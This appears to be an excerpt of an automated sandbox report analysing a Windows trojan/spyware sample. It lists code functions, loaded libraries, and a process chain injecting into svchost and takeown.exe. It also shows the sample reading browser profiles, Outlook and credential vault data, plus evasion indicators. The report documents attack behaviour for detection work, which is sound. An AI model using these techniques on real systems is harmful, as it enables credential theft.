                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0358995010_2_03589950
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0359B95010_2_0359B950
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0361591010_2_03615910
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035ED80010_2_035ED800
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035838E010_2_035838E0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363FF0910_2_0363FF09
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03581F9210_2_03581F92
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363FFB110_2_0363FFB1
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03589EB010_2_03589EB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03637D7310_2_03637D73
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03583D4010_2_03583D40
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03631D5A10_2_03631D5A
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0359FDC010_2_0359FDC0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035F9C3210_2_035F9C32
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363FCF210_2_0363FCF2
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E11AA010_2_02E11AA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E0CB2010_2_02E0CB20
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E0AB1010_2_02E0AB10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E0C90010_2_02E0C900
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E0AC6010_2_02E0AC60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E0AC5410_2_02E0AC54
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E013A110_2_02E013A1
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E1336010_2_02E13360
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E1335C10_2_02E1335C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E1514010_2_02E15140
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E2B8C010_2_02E2B8C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_033EE21510_2_033EE215
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_033EE0F810_2_033EE0F8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_033ED67810_2_033ED678
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_033EE5AC10_2_033EE5AC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 035C7E54 appears 101 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 035FF290 appears 105 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 035EEA12 appears 86 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 035B5130 appears 58 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 0356B970 appears 250 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 110 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0312B970 appears 250 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03175130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031AEA12 appears 86 times
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: String function: 00B28900 appears 42 times
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: String function: 00B20AE3 appears 70 times
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: String function: 00B07DE1 appears 36 times
                Source: gbdXRnNKkm.exe, 00000000.00000003.1224697319.0000000003DDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs gbdXRnNKkm.exe
                Source: gbdXRnNKkm.exe, 00000000.00000003.1225490143.0000000003C33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs gbdXRnNKkm.exe
                Source: gbdXRnNKkm.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@7/7
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6A06A GetLastError,FormatMessageW,0_2_00B6A06A
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B581CB AdjustTokenPrivileges,CloseHandle,0_2_00B581CB
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B587E1
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B6B3FB
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00B7EE0D
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B783BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00B783BB
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00B04E89
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeFile created: C:\Users\user\AppData\Local\Temp\aut480C.tmpJump to behavior
                Source: gbdXRnNKkm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: takeown.exe, 0000000A.00000002.3659176995.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3659176995.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3659176995.0000000002F14000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1592633422.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1592754692.0000000002F14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: gbdXRnNKkm.exeReversingLabs: Detection: 71%
                Source: gbdXRnNKkm.exeVirustotal: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\gbdXRnNKkm.exe "C:\Users\user\Desktop\gbdXRnNKkm.exe"
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gbdXRnNKkm.exe"
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
                Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gbdXRnNKkm.exe"Jump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: gbdXRnNKkm.exeStatic file information: File size 1150464 > 1048576
                Source: gbdXRnNKkm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: gbdXRnNKkm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: gbdXRnNKkm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: gbdXRnNKkm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: gbdXRnNKkm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: gbdXRnNKkm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: gbdXRnNKkm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000003.00000003.1380325683.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1380395659.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1380378747.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, D3y5b0UXPl.exe, 00000009.00000003.1489112387.0000000000869000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: gbdXRnNKkm.exe, 00000000.00000003.1225085870.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, gbdXRnNKkm.exe, 00000000.00000003.1227259521.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1412808640.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1412808640.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1316834190.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318497401.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1412527420.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1418995866.0000000003397000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3660913477.0000000003540000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3660913477.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: takeown.pdb source: svchost.exe, 00000003.00000003.1380325683.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1380395659.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1380378747.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, D3y5b0UXPl.exe, 00000009.00000003.1489112387.0000000000869000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: gbdXRnNKkm.exe, 00000000.00000003.1225085870.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, gbdXRnNKkm.exe, 00000000.00000003.1227259521.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1412808640.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1412808640.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1316834190.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318497401.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000A.00000003.1412527420.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1418995866.0000000003397000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3660913477.0000000003540000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3660913477.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: D3y5b0UXPl.exe, 00000009.00000002.3665968001.000000000601C000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 0000000A.00000002.3659176995.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3661272291.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1701587870.000000002D27C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: D3y5b0UXPl.exe, 00000009.00000002.3665968001.000000000601C000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 0000000A.00000002.3659176995.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3661272291.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1701587870.000000002D27C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: D3y5b0UXPl.exe, 00000009.00000000.1333349591.00000000006DF000.00000002.00000001.01000000.00000008.sdmp
                Source: gbdXRnNKkm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: gbdXRnNKkm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: gbdXRnNKkm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: gbdXRnNKkm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: gbdXRnNKkm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B04B37 LoadLibraryA,GetProcAddress,0_2_00B04B37
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B28945 push ecx; ret 0_2_00B28958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00508800 push ebx; ret 3_2_00508805
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0050A113 push edi; iretd 3_2_0050A11E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0050A10F push edi; iretd 3_2_0050A11E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F8138 push es; ret 3_2_004F8139
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0050A1C6 push edi; iretd 3_2_0050A1C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_005039B1 push esp; ret 3_2_00503A0A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00503A8F push es; iretd 3_2_00503A9E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F1430 push ds; retf 3_2_004F14D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F154E push esi; iretd 3_2_004F1557
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F15BF push ds; retf 3_2_004F1600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0050A6EB push cs; ret 3_2_0050A6EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0050EF2A push edi; iretd 3_2_0050EF2D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F2FF0 push eax; ret 3_2_004F2FF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310225F pushad ; ret 3_2_031027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031027FA pushad ; ret 3_2_031027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031309AD push ecx; mov dword ptr [esp], ecx3_2_031309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310283D push eax; iretd 3_2_03102858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310135E push eax; iretd 3_2_03101369
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AF4241 push edi; iretd 9_2_03AF4242
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AE21B3 push es; ret 9_2_03AE21B4
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AF418A push edi; iretd 9_2_03AF4199
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AF20CE push eax; retf 9_2_03AF20CF
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AF287B push ebx; ret 9_2_03AF2880
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AE3875 push esp; iretd 9_2_03AE387D
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AE3F1C push edx; retf 9_2_03AE3F2B
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AF4766 push cs; ret 9_2_03AF4767
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AE3D2C push ss; ret 9_2_03AE3D80
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_0847585F push esp; iretd 9_2_08475867
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_08484865 push ebx; ret 9_2_0848486A
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_08486178 push edi; iretd 9_2_08486183
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B048D7
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B85376
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B23187
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeAPI/Special instruction interceptor: Address: 3563254
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD324
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD7E4
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD944
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD504
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD544
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD1E4
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105D0154
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0317096E rdtsc 3_2_0317096E
                Source: C:\Windows\SysWOW64\takeown.exeWindow / User API: threadDelayed 5356Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeWindow / User API: threadDelayed 4616Jump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105770
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeAPI coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\takeown.exeAPI coverage: 2.8 %
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exe TID: 7788Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7776Thread sleep count: 5356 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7776Thread sleep time: -10712000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7776Thread sleep count: 4616 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7776Thread sleep time: -9232000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\takeown.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B6445A
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6C6D1 FindFirstFileW,FindClose,0_2_00B6C6D1
